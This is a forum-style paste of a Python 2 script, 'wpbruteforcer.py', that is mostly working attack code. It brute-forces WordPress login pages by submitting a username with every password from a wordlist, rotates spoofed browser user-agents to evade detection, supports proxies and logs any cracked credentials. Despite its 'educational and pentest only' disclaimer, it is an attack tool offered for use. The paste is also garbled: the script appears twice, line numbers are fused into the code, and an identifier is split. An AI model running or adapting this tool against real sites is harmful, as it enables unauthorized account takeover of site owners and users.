[php]001 #!/usr/bin/python
002 # This is wordpress bruteforcer tools
003 # This was written for educational purpose and pentest only. Use it at your own risk.
004 # Author will not be responsible for any damage !!
005 # Toolname : wpbruteforcer.py
006 # Programmer : gunslinger_
007 # Version : 1.0
008 # Date : Wed Aug 4 13:38:13 WIT 2010
009
010 import re
011 import os
012 import sys
013 import random
014 import warnings
015 import time
016 try:
017 import mechanize
018 except ImportError:
019 print "[*] Please install mechanize python module first"
020 sys.exit(1)
021 except KeyboardInterrupt:
022 print "\n[*] Exiting program...\n"
023 sys.exit(1)
024 try:
025 import cookielib
026 except ImportError:
027 print "[*] Please install cookielib python module first"
028 sys.exit(1)
029 except KeyboardInterrupt:
030 print "\n[*] Exiting program...\n"
031 sys.exit(1)
032
033 warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
034
035 # define variable
036 __programmer__ = "gunslinger_ "
037 __version__ = "1.0"
038 verbose = False
039 useproxy = False
040 usepassproxy = False
041 log = 'wpbruteforcer.log'
042 file = open(log, "a")
043 success = 'Dashboard'
044 # some cheating ..
045 ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 046 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
047 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
048 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
049 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
050 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
051 'Microsoft Internet Explorer/4.0b1 (Windows 95)',
052 'Opera/8.00 (Windows NT 5.1; U; en)',
053 'amaya/9.51 libwww/5.4.0',
054 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
055 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
056 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
057 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
058 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 [email protected])',
059 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
060 ]
061 wordpress = '''
062 _
063 | |
064 __ _____ _ __ __| |_ __ _ __ ___ ___ ___
065 \ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|
066 \ V V / (_) | | | (_| | |_) | | | __/\\__ \\__ \\
067 \_/\_/ \\___/|_| \__,_| .__/|_| \\___||___/___/
068 | |
069 |_| bruteforcer...
070
071 Programmer : %s
072 Version : %s''' % (__programmer__, __version__)
073 option = '''
074 Usage : %s [options]
075 Option : -t, --target | Site for bruteforce wp-admin
076 -u, --username | User for bruteforcing
077 -w, --wordlist | Wordlist used for bruteforcing
078 -v, --verbose | Set %s will be verbose (more talkactiveable) 079 -p, --proxy | Set http proxy will be use
080 -k, --usernameproxy | Set username at proxy will be use
081 -i, --passproxy | Set password at proxy will be use
082 -l, --log | Specify output filename (default : fbbruteforcer.log) 083 -h, --help | Print this help
084
085 Example : %s -t target.com -u jack -w wordlist.txt"
086 087 P.S : add "&" to run in the background
088 ''' % (sys.argv[0], sys.argv[0], sys.argv[0])
089 hme = '''
090 Usage : %s [option]
091 -h or --help for get help
092 ''' % sys.argv[0]
093
094 def helpme():
095 print wordpress
096 print option
097 file.write(wordpress)
098 file.write(option)
099 sys.exit(1)
100
101 def helpmee():
102 print wordpress
103 print hme
104 file.write(wordpress)
105 file.write(hme)
106 sys.exit(1)
107
108 for arg in sys.argv:
109 try:
110 if arg.lower() == '-u' or arg.lower() == '--user':
111 username = sys.argv[int(sys.argv[1:].index(arg))+2]
112 if arg.lower() == '-t' or arg.lower() == '--target':
113 target = sys.argv[int(sys.argv[1:].index(arg))+2]
114 if "http://" in target:
115 target = target.replace("http://","")
116 if "www." in target:
117 target = target.replace("www.","")
118 targetsite = "http://www."+target+"/wp-login.php"
119 elif arg.lower() == '-w' or arg.lower() == '--wordlist':
120 wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
121 elif arg.lower() == '-l' or arg.lower() == '--log':
122 log = sys.argv[int(sys.argv[1:].index(arg))+2]
123 elif arg.lower() == '-p' or arg.lower() == '--proxy':
124 useproxy = True
125 proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
126 elif arg.lower() == '-k' or arg.lower() == '--userproxy':
127 usepassproxy = True
128 usw = sys.argv[int(sys.argv[1:].index(arg))+2]
129 elif arg.lower() == '-i' or arg.lower() == '--passproxy':
130 usepassproxy = True
131 usp = sys.argv[int(sys.argv[1:].index(arg))+2]
132 elif arg.lower() == '-v' or arg.lower() == '--verbose':
133 verbose = True
134 elif arg.lower() == '-h' or arg.lower() == '--help':
135 helpme()
136 elif len(sys.argv) <= 1:
137 helpmee()
138 except IOError:
139 helpme()
140 except NameError:
141 helpme()
142 except IndexError:
143 helpme()
144
145 def bruteforce(word):
146 try:
147 sys.stdout.write("\r[*] Trying %s... \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t " % word)
148 file.write("[*] Trying %s\n" % word)
149 sys.stdout.flush()
150 br.addheaders = [('User-agent', random.choice(ouruseragent))]
151 opensite = br.open(targetsite)
152 br.select_form(nr=0)
153 br.form['log'] = username
154 br.form['pwd'] = word
155 br.submit()
156 response = br.response().read()
157 if verbose:
158 print response
159 if success in response:
160 print "\n\n[*] Logging in success..."
161 print "[*] Username : %s" % (username)
162 print "[*] Password : %s\n" % (word)
163 file.write("\n[*] Logging in success...")
164 file.write("\n[*] Username : %s" % (username))
165 file.write("\n[*] Password : %s\n\n" % (word))
166 sys.exit(1)
167 except KeyboardInterrupt:
168 print "\n[*] Exiting program...\n"
169 sys.exit(1)
170 except mechanize._mechanize.FormNotFoundError:
171 print "\n[*] Can't launch attack sorry, form is different\n"
172 file.write("\n[*] Can't launch attack sorry, form is different\n")
173 sys.exit(1)
174 except mechanize._form.ControlNotFoundError:
175 print "\n[*] Can't launch attack sorry, form is different\n"
176 file.write("\n[*] Can't launch attack sorry, form is different\n")
177 sys.exit(1)
178
179 def releaser():
180 global word
181 for word in words:
182 bruteforce(word.replace("\n",""))
183
184 def main():
185 global br
186 global words
187 try:
188 br = mechanize.Browser()
189 cj = cookielib.LWPCookieJar()
190 br.set_cookiejar(cj)
191 br.set_handle_equiv(True)
192 br.set_handle_gzip(True)
193 br.set_handle_redirect(True)
194 br.set_handle_referer(True)
195 br.set_handle_robots(False)
196 br.set_debug_http(False)
197 br.set_debug_redirects(False)
198 br.set_debug_redirects(False)
199 br.set_handle_refresh(mechanize._http.HTTPRefreshP rocessor(), max_time=1)
200 if useproxy:
201 br.set_proxies({"http": proxy})
202 if usepassproxy:
203 br.add_proxy_password(usw, usp)
204 if verbose:
205 br.set_debug_http(True)
206 br.set_debug_redirects(True)
207 br.set_debug_redirects(True)
208 except KeyboardInterrupt:
209 print "\n[*] Exiting program...\n"
210 file.write("\n[*] Exiting program...\n")
211 sys.exit(1)
212 try:
213 preventstrokes = open(wordlist, "r")
214 words = preventstrokes.readlines()
215 count = 0
216 while count < len(words):
217 words[count] = words[count].strip()
218 count += 1
219 except IOError:
220 print "\n[*] Error: Check your wordlist path\n"
221 file.write("\n[*] Error: Check your wordlist path\n")
222 sys.exit(1)
223 except NameError:
224 helpme()
225 except KeyboardInterrupt:
226 print "\n[*] Exiting program...\n"
227 file.write("\n[*] Exiting program...\n")
228 sys.exit(1)
229 try:
230 print wordpress
231 print "\n[*] Starting attack at %s" % time.strftime("%X")
232 print "[*] Target site : %s" % (targetsite)
233 print "[*] Account for bruteforcing \"%s\"" % (username)
234 print "[*] Loaded :",len(words),"words"
235 print "[*] Bruteforcing wp-login, please wait..."
236 file.write(wordpress)
237 file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
238 file.write("\n[*] Target site : %s" % (targetsite))
239 file.write("\n[*] Account for bruteforcing \"%s\"" % (username))
240 file.write("\n[*] Loaded : %d words" % int(len(words)))
241 file.write("\n[*] Bruteforcing wp-login, please wait...\n")
242 except KeyboardInterrupt:
243 print "\n[*] Exiting program...\n"
244 sys.exit(1)
245 try:
246 releaser()
247 bruteforce(word)
248 except NameError:
249 helpme()
250
251 if __name__ == '__main__':
252 main()[/php]
002 # This is wordpress bruteforcer tools
003 # This was written for educational purpose and pentest only. Use it at your own risk.
004 # Author will not be responsible for any damage !!
005 # Toolname : wpbruteforcer.py
006 # Programmer : gunslinger_
007 # Version : 1.0
008 # Date : Wed Aug 4 13:38:13 WIT 2010
009
010 import re
011 import os
012 import sys
013 import random
014 import warnings
015 import time
016 try:
017 import mechanize
018 except ImportError:
019 print "[*] Please install mechanize python module first"
020 sys.exit(1)
021 except KeyboardInterrupt:
022 print "\n[*] Exiting program...\n"
023 sys.exit(1)
024 try:
025 import cookielib
026 except ImportError:
027 print "[*] Please install cookielib python module first"
028 sys.exit(1)
029 except KeyboardInterrupt:
030 print "\n[*] Exiting program...\n"
031 sys.exit(1)
032
033 warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
034
035 # define variable
036 __programmer__ = "gunslinger_ "
037 __version__ = "1.0"
038 verbose = False
039 useproxy = False
040 usepassproxy = False
041 log = 'wpbruteforcer.log'
042 file = open(log, "a")
043 success = 'Dashboard'
044 # some cheating ..
045 ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 046 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
047 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
048 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
049 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
050 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
051 'Microsoft Internet Explorer/4.0b1 (Windows 95)',
052 'Opera/8.00 (Windows NT 5.1; U; en)',
053 'amaya/9.51 libwww/5.4.0',
054 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
055 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
056 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
057 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
058 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 [email protected])',
059 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
060 ]
061 wordpress = '''
062 _
063 | |
064 __ _____ _ __ __| |_ __ _ __ ___ ___ ___
065 \ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|
066 \ V V / (_) | | | (_| | |_) | | | __/\\__ \\__ \\
067 \_/\_/ \\___/|_| \__,_| .__/|_| \\___||___/___/
068 | |
069 |_| bruteforcer...
070
071 Programmer : %s
072 Version : %s''' % (__programmer__, __version__)
073 option = '''
074 Usage : %s [options]
075 Option : -t, --target | Site for bruteforce wp-admin
076 -u, --username | User for bruteforcing
077 -w, --wordlist | Wordlist used for bruteforcing
078 -v, --verbose | Set %s will be verbose (more talkactiveable) 079 -p, --proxy | Set http proxy will be use
080 -k, --usernameproxy | Set username at proxy will be use
081 -i, --passproxy | Set password at proxy will be use
082 -l, --log | Specify output filename (default : fbbruteforcer.log) 083 -h, --help | Print this help
084
085 Example : %s -t target.com -u jack -w wordlist.txt"
086 087 P.S : add "&" to run in the background
088 ''' % (sys.argv[0], sys.argv[0], sys.argv[0])
089 hme = '''
090 Usage : %s [option]
091 -h or --help for get help
092 ''' % sys.argv[0]
093
094 def helpme():
095 print wordpress
096 print option
097 file.write(wordpress)
098 file.write(option)
099 sys.exit(1)
100
101 def helpmee():
102 print wordpress
103 print hme
104 file.write(wordpress)
105 file.write(hme)
106 sys.exit(1)
107
108 for arg in sys.argv:
109 try:
110 if arg.lower() == '-u' or arg.lower() == '--user':
111 username = sys.argv[int(sys.argv[1:].index(arg))+2]
112 if arg.lower() == '-t' or arg.lower() == '--target':
113 target = sys.argv[int(sys.argv[1:].index(arg))+2]
114 if "http://" in target:
115 target = target.replace("http://","")
116 if "www." in target:
117 target = target.replace("www.","")
118 targetsite = "http://www."+target+"/wp-login.php"
119 elif arg.lower() == '-w' or arg.lower() == '--wordlist':
120 wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
121 elif arg.lower() == '-l' or arg.lower() == '--log':
122 log = sys.argv[int(sys.argv[1:].index(arg))+2]
123 elif arg.lower() == '-p' or arg.lower() == '--proxy':
124 useproxy = True
125 proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
126 elif arg.lower() == '-k' or arg.lower() == '--userproxy':
127 usepassproxy = True
128 usw = sys.argv[int(sys.argv[1:].index(arg))+2]
129 elif arg.lower() == '-i' or arg.lower() == '--passproxy':
130 usepassproxy = True
131 usp = sys.argv[int(sys.argv[1:].index(arg))+2]
132 elif arg.lower() == '-v' or arg.lower() == '--verbose':
133 verbose = True
134 elif arg.lower() == '-h' or arg.lower() == '--help':
135 helpme()
136 elif len(sys.argv) <= 1:
137 helpmee()
138 except IOError:
139 helpme()
140 except NameError:
141 helpme()
142 except IndexError:
143 helpme()
144
145 def bruteforce(word):
146 try:
147 sys.stdout.write("\r[*] Trying %s... \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t " % word)
148 file.write("[*] Trying %s\n" % word)
149 sys.stdout.flush()
150 br.addheaders = [('User-agent', random.choice(ouruseragent))]
151 opensite = br.open(targetsite)
152 br.select_form(nr=0)
153 br.form['log'] = username
154 br.form['pwd'] = word
155 br.submit()
156 response = br.response().read()
157 if verbose:
158 print response
159 if success in response:
160 print "\n\n[*] Logging in success..."
161 print "[*] Username : %s" % (username)
162 print "[*] Password : %s\n" % (word)
163 file.write("\n[*] Logging in success...")
164 file.write("\n[*] Username : %s" % (username))
165 file.write("\n[*] Password : %s\n\n" % (word))
166 sys.exit(1)
167 except KeyboardInterrupt:
168 print "\n[*] Exiting program...\n"
169 sys.exit(1)
170 except mechanize._mechanize.FormNotFoundError:
171 print "\n[*] Can't launch attack sorry, form is different\n"
172 file.write("\n[*] Can't launch attack sorry, form is different\n")
173 sys.exit(1)
174 except mechanize._form.ControlNotFoundError:
175 print "\n[*] Can't launch attack sorry, form is different\n"
176 file.write("\n[*] Can't launch attack sorry, form is different\n")
177 sys.exit(1)
178
179 def releaser():
180 global word
181 for word in words:
182 bruteforce(word.replace("\n",""))
183
184 def main():
185 global br
186 global words
187 try:
188 br = mechanize.Browser()
189 cj = cookielib.LWPCookieJar()
190 br.set_cookiejar(cj)
191 br.set_handle_equiv(True)
192 br.set_handle_gzip(True)
193 br.set_handle_redirect(True)
194 br.set_handle_referer(True)
195 br.set_handle_robots(False)
196 br.set_debug_http(False)
197 br.set_debug_redirects(False)
198 br.set_debug_redirects(False)
199 br.set_handle_refresh(mechanize._http.HTTPRefreshP rocessor(), max_time=1)
200 if useproxy:
201 br.set_proxies({"http": proxy})
202 if usepassproxy:
203 br.add_proxy_password(usw, usp)
204 if verbose:
205 br.set_debug_http(True)
206 br.set_debug_redirects(True)
207 br.set_debug_redirects(True)
208 except KeyboardInterrupt:
209 print "\n[*] Exiting program...\n"
210 file.write("\n[*] Exiting program...\n")
211 sys.exit(1)
212 try:
213 preventstrokes = open(wordlist, "r")
214 words = preventstrokes.readlines()
215 count = 0
216 while count < len(words):
217 words[count] = words[count].strip()
218 count += 1
219 except IOError:
220 print "\n[*] Error: Check your wordlist path\n"
221 file.write("\n[*] Error: Check your wordlist path\n")
222 sys.exit(1)
223 except NameError:
224 helpme()
225 except KeyboardInterrupt:
226 print "\n[*] Exiting program...\n"
227 file.write("\n[*] Exiting program...\n")
228 sys.exit(1)
229 try:
230 print wordpress
231 print "\n[*] Starting attack at %s" % time.strftime("%X")
232 print "[*] Target site : %s" % (targetsite)
233 print "[*] Account for bruteforcing \"%s\"" % (username)
234 print "[*] Loaded :",len(words),"words"
235 print "[*] Bruteforcing wp-login, please wait..."
236 file.write(wordpress)
237 file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
238 file.write("\n[*] Target site : %s" % (targetsite))
239 file.write("\n[*] Account for bruteforcing \"%s\"" % (username))
240 file.write("\n[*] Loaded : %d words" % int(len(words)))
241 file.write("\n[*] Bruteforcing wp-login, please wait...\n")
242 except KeyboardInterrupt:
243 print "\n[*] Exiting program...\n"
244 sys.exit(1)
245 try:
246 releaser()
247 bruteforce(word)
248 except NameError:
249 helpme()
250
251 if __name__ == '__main__':
252 main()[/php]